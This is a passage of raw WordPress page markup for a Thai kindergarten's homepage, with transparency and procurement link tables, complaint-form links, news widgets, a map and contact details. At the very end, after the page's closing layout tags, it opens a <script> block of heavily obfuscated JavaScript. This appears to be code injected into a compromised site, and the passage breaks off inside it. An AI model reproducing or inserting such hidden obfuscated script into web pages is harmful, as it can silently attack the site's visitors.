900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 